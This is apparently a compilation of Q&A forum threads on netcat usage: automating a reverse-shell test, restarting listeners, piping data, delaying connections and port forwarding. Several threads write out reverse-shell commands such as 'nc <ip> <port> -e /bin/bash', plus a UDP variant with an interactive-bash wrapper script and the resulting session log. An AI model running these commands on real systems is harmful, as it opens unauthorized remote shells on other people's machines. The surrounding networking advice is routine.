I do reverse shell with netcat.
A side nc 192.168.100.113 4444 –e /bin/bash
B side nc –lvp 4444
I want to automated and check this process from B side with shell script that reverse shell really working.
In B side, after nc –lvp 4444 How can I wait until I will get a connection and than send ls command and check the result?
Related
Let's suppose there is a TCP server listening to port 8080.
The client connects and sends, for example, a "hello" message after using the Netcat command:
nc localhost:8080
How can I send the "hello" message 1000 times without me being typing? Can I access the Netcat file and add a 'for' or 'while' loop?
No need to modify nc; just pipe your input to it: yes hello | head -n 1000 | nc localhost:8080.
I have a bash script:
#!/bin/bash
while :
do
nc -l -p 30003 | python3 script.py
done
I want that listening works all time.
nc localhost 30003 # works, fine
type something
Ctrl+C
Try again nc localhost 30003 # not working
So, after socket closed first time, it never open again..
How can I fix it?
Also I have many defined function inside python script, so I donw want to run it from the beginning. Is it possible?
Thanks.
The problem is that nc -l -p 30003 is not run again before python3 script.py finishes. After Ctrl+C nc localhost 30003 has no listening nc to connect to. If you replace python3 script.py with cat the nc server will restart. So the simple solution would be to have script.py exit.
I assume that you have a state that you want to save. One possibility is to have a file with the state (variables etc.) saved as JSON. Another is to have nc write the output to a file, and have script.py read from that file.
If you have the time, and want to learn some networking, I recommend to look at the python socket API. You can make script.py act as a server and read the data directly from the connection endpoint, rather than going through nc.
Hope this helps.
I'm trying to set up a reverse shell between two Linux machines (Kali v. 1.0.9), using the default installation of netcat.
Using the commands below, I was able to make a connection and relay text information between the two machines:
Listener:
nc -luvvp <port>
Client:
nc -uvv <ip> <port>
However, modifying the client's arguments to include executing bash upon a connection:
nc -uvv <ip> <port> -e /bin/bash
And no connection is made, I'm not quite sure how to get this to work, this doesn't seem to be a problem that other people have experienced and was unsure of how to solve the issue. It might also help to know that these commands work fine using the normal TCP mode, it's only after adding the u flag that it stops working for shells. Any help would be appreciated, thanks!
I did some experiments and realized that tunneling shell session via netcat over UDP is almost impossible. The bash does not know that the underlying file descriptor is the UDP socket bash calls read() with buffer size 1. That is fine for interactive shell but when received UDP datagram contains more than 1 byte then data is lost (except the first byte in the datagram).
The netcat uses the standard line buffer at the stdin and the whole line is sent in a single UDP datagram. But bash reads only the first byte from each line.
The other problem is that the client netcat exucuted via command
nc -uvv -e "/bin/bash" <ip> <port>
does not send any data to server because the bash is executed in non-interactive mode and it just waits for a command. The solution is to write a script to execute bash in the interactive mode:
$ cat bashinteractive
#!/bin/bash
/bin/bash -i
and call server
$ nc -luvvp <port>
and client
nc -uvv -e "./bashinteractive" <ip> <port>
But the usage is very inconvenient. It is possible to write command on server when each byte is followed by ENTER
$ ./nc -luvvp 6666
listening on [any] 6666 ...
connect to [10.0.2.15] from xxx.yyy.zzz [10.0.2.16] 37552
$ c
cd
d
/
/
$ l
ls
s
-
-l
l
total 92
drwxr-xr-x 2 root root 4096 Feb 7 15:22 bin
....
drwxr-xr-x 13 root root 4096 Oct 16 2013 var
$ e
ex
xi
it
t
exit
sent 30, rcvd 1422 : Connection refused
So my recommendation is to use other tool than netcat. Perhaps you can try
http://code.google.com/p/udptunnel/
How do I get the name of a process from a remote machine without ssh.
I have to get the name of the process without doing ssh or any other such utility.
Thanks in advance.
You can do it very quickly using netcat nc
On the remote server run this command:
while $(true); do ps -eaf | nc -l 1234; done
This uses netcat to send the output of ps to port 1234. It is in a loop so that it will work more than once.
Then from your local you just have to run this command:
nc my_server 1234
And you will get a list of all the processes. If you don't have nc on the client you can just use telnet:
telnet my_server 1234
Running in bash under Ubuntu:
I have a source that generates me some output, but not straight away. Let's assume it is a first netcat listening on a socket: netcat -l 12345.
And I would like to pipe it to an outgoing netcat (connecting over TCP), e.g. netcat -l 12345 | netcat localhost 54321. But the tricky bit is, that I know there is nothing listening for that incoming connection on localhost 54321 when I run the command, but I know there will be one when the first actual character arrives through the pipe.
So my question is: is there a way either:
to delay the execution of the outgoing netcat until the first character arrives into the pipe, or
to delay the outgoing netcat from trying to establish the TCP connection until it receives the first character on its standard input? (no straight option for that in man, switching to UDP is not acceptable)
Thanks in advance!
Edit: In reality, the source is more complex than a netcat, namely it is a listening netcat piped through all sort of stream modification.
Using the research you already did and that I commented to (by not knowing it was an answer to your own question), here is the full delayed_netcat.sh:
#!/bin/bash
read line
netcat "${#}" < <(echo $line ; cat)
This first waits for a line of input and later prepends that line using a simple echo to the "newly generated" input to the actual netcat. The rest of stdin is just redirected using cat which slurps it from stdin and adds it to the input of netcat. It also supports passing commandline options and arguments to the "real" netcat.
The usage is as follows:
netcat -l 12345 | cmd1 | cmd2 | ... | ./delayed_netcat.sh localhost 54321
The netcat is delayed till the first line is read. If you really want to start it after the first character is read the parts with read and echo need some rewrite.
Port Forwarding or Port Mapping with netcat:
ncat -l -p 12345 -c 'ncat localhost 54321'
Using socat:
socat TCP4-LISTEN:12345 TCP4:localhost:54321
This command exits after the first connection is done.
I have found an answer to my question, but it is awful... so still looking for something better.
netcat -l 12345 | gawk '(NR==1){print""}{print;fflush()}' | ./delayed_netcat.sh
where ./delayed_netcat.sh:
#!/bin/sh
read line
netcat localhost 12345
So the read line delays the netcat localhost 12345 by waiting for and consuming the first input line, and I use gawk '(NR==1){print""}{print;fflush()}' to insert an empty line just before the first record... I'm sure there is room for much improvement to that!